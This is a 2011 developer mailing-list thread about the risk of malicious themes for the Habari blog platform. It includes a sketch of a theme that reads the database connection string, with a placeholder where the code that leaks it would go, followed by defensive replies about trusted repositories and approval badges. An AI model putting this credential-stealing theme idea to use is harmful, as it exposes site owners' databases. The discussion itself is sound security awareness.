What about an encrypted approved badge to put on 3rd party sites that links back to a page (wiki?) only editable by certain people.
--- Amanda Moore Sent from my iPhone On Feb 4, 2011, at 6:02 PM, Chris Meller <[email protected]> wrote: > This was discussed on the private list after it was forwarded to > [email protected] and the consensus is that this is just something we have to > deal with. Themes containing malware and exploits have become an increasingly > popular offering on sites advertising free blog themes, but as long as you > allow any type of scripting access (whether it be raw PHP or a > pseudo-language like Smarty) there is not much that can be done - the > potential for foul play will always exist. > > The same level of care and suspicion should apply when downloading a theme or > plugin as when downloading anything else from the internet. Users should be > encouraged to use addons from reputable locations like the -extras > repository, where there is at least some additional visibility for > contributions, and always be wary of any third party sites. > > > On Feb 4, 2011, at 12:21 AM, Matt-SD wrote: > >> Say I build a theme. >> >> Theme.xml contains legitimate stuff, but index.php (and perhaps the >> other files) contain some less-than-good stuff under the hood. >> >> It looks like an acceptable theme when you see the screenshot & when >> you download it, you activate it & look at your theme to marvel in its >> greatness. BUT: somewhere hidden in the theme is this little gem: >> >> <?php >> $str = Config::get('db_connection'); >> ** Insert cross-site scripting here ** >> ?> >> >> Now your database info has been sent to another site & anybody who >> reads it on that other site can get into your database & mess around >> in it. >> >> -- >> To post to this group, send email to [email protected] >> To unsubscribe from this group, send email to >> [email protected] >> For more options, visit this group at >> http://groups.google.com/group/habari-dev > > -- > To post to this group, send email to [email protected] > To unsubscribe from this group, send email to > [email protected] > For more options, visit this group at > http://groups.google.com/group/habari-dev -- To post to this group, send email to [email protected] To unsubscribe from this group, send email to [email protected] For more options, visit this group at http://groups.google.com/group/habari-dev
